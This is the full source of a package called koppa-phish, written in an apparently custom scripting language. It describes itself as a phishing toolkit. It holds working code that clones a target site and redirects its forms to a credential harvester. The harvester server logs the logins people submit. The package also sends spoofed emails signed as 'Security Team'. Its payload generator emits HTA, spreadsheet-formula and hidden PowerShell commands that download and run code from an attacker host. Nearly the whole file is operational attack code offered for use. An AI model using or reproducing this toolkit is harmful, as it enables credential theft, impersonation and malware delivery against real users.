## koppa package: koppa-phish
## version: 1.0.0
## description: Phishing toolkit — clone sites, credential harvester, email spoofer, payload delivery
## author: KOPPA-OS
## tags: phishing, social-engineering, credential, email

import net, log, sys, crypt

fn clone_site(url, outdir) {
    log.info("[*] Cloning site: " + url)
    sys.exec("mkdir -p " + (outdir or "/tmp/phish"))
    let resp = net.http_get(url)
    let html = resp.body

    # Rewrite form actions to point to harvester
    html = html.replace("action=\"", "action=\"/harvest?orig=")
    html = html.replace("action='", "action='/harvest?orig=")
    sys.write_file((outdir or "/tmp/phish") + "/index.html", html)
    log.ok("[+] Site cloned to " + (outdir or "/tmp/phish") + "/index.html")
}

fn start_harvester(lhost, lport, redirect_url) {
    log.info("[*] Credential harvester: http://" + lhost + ":" + lport)
    log.info("[*] Will redirect to: " + redirect_url)
    let server_code = "
import http.server, urllib.parse, datetime

REDIRECT = '" + redirect_url + "'
LOG_FILE = '/tmp/harvested.txt'

class Handler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        body   = self.rfile.read(length).decode()
        ts     = datetime.datetime.now().isoformat()
        creds  = urllib.parse.unquote(body)
        print(f'[+] CAPTURED {ts}: {creds}')
        with open(LOG_FILE, 'a') as f:
            f.write(f'{ts} | {self.client_address[0]} | {creds}\n')
        self.send_response(302)
        self.send_header('Location', REDIRECT)
        self.end_headers()
    def log_message(self, *a): pass

http.server.HTTPServer(('" + lhost + "', " + lport + "), Handler).serve_forever()
"
    sys.write_file("/tmp/harvester.py", server_code)
    log.ok("[+] Starting harvester... (Ctrl+C to stop)")
    log.ok("[+] Credentials saved to /tmp/harvested.txt")
    sys.exec("python3 /tmp/harvester.py")
}

fn gen_email(from_name, from_addr, to_addr, subject, body_html, smtp_host) {
    log.info("[*] Sending phishing email to: " + to_addr)
    let py = "
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
msg = MIMEMultipart('alternative')
msg['Subject'] = '" + subject + "'
msg['From']    = '" + from_name + " <" + from_addr + ">'
msg['To']      = '" + to_addr + "'
msg.attach(MIMEText('''" + body_html + "''', 'html'))
s = smtplib.SMTP('" + (smtp_host or "localhost") + "', 25)
s.sendmail('" + from_addr + "', '" + to_addr + "', msg.as_string())
s.quit()
print('[+] Email sent')
"
    sys.write_file("/tmp/phish_send.py", py)
    sys.exec("python3 /tmp/phish_send.py")
}

fn gen_payload_link(lhost, lport, payload_type) {
    log.info("[*] Generating payload delivery link...")
    let payloads = {
        "hta":  "<script>new ActiveXObject('WScript.Shell').Run('mshta http://" + lhost + ":" + lport + "/payload.hta')</script>",
        "doc":  "=cmd|' /C powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString(http://" + lhost + ":" + lport + "/ps.ps1)\"'!A1",
        "lnk":  "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://" + lhost + ":" + lport + "/ps.ps1')\""
    }
    let pay = payloads[payload_type] or payloads["hta"]
    log.ok("[+] " + payload_type.upper() + " payload:\n" + pay)
    return pay
}

fn main(args) {
    log.info("[koppa-phish] Phishing Toolkit v1.0")
    let mode = args[0] or sys.prompt("Mode (clone|harvest|email|payload): ")
    if mode == "clone" {
        let url = args[1] or sys.prompt("Target URL to clone: ")
        clone_site(url, args[2])
    }
    if mode == "harvest" {
        let lh = args[1] or sys.prompt("LHOST: ")
        let lp = args[2] or "8080"
        let redir = args[3] or sys.prompt("Redirect to (real site): ")
        start_harvester(lh, lp, redir)
    }
    if mode == "email" {
        let fr = args[1] or sys.prompt("From address: ")
        let to = args[2] or sys.prompt("To address: ")
        let subj = args[3] or sys.prompt("Subject: ")
        let body = args[4] or sys.prompt("HTML body: ")
        gen_email("Security Team", fr, to, subj, body, args[5])
    }
    if mode == "payload" {
        let lh = args[1] or sys.prompt("LHOST: ")
        let lp = args[2] or "8443"
        let t  = args[3] or "hta"
        gen_payload_link(lh, lp, t)
    }
}
